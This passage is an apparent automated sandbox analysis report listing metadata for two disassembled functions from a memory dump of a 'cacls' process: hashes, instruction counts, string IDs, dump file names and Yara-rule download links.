                                                            • Opcode Fuzzy Hash: 9c2c60ac1f108b9f15a83bfd4e063142b647da65f57920970a05d7fa6d164a5d
                                                            • Instruction Fuzzy Hash: EF316676A102599FCF20DE7DCC40BEEB7B8EB44610F4445DAE849E7280EB30DA54CBA1
                                                            Function 03857D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-
                                                            • API String ID: 1302938615-2137968064
                                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction ID: 0382ea60d47b78b08c9bc9bfdb872a06fb4dc3f89088065320478fc16ba6c64a
                                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction Fuzzy Hash: BB91C271E0031A9BDF24DEE9C880ABEB7A5AF44720F58859AFC65E72C0E7309940CB51
                                                            Function 03819126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037E0000, based on PE: true
                                                            • Associated: 00000009.00000002.2553266159.0000000003909000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000390D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_37e0000_cacls.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $$@
                                                            • API String ID: 0-1194432280
                                                            • Opcode ID: f31c1675fca03a7fdc3413b4c893549b913344d9144384a75b6034bd8152520c
                                                            • Instruction ID: 28992a0dfd8021b2ba95009fee1cc6b24fbb74253f212efb204f6609b364213b
                                                            • Opcode Fuzzy Hash: f31c1675fca03a7fdc3413b4c893549b913344d9144384a75b6034bd8152520c
                                                            • Instruction Fuzzy Hash: 80813875D002699BDB35DB94CC44BEAB7B8AB08710F0445EAE919F7280D7309E84CFA1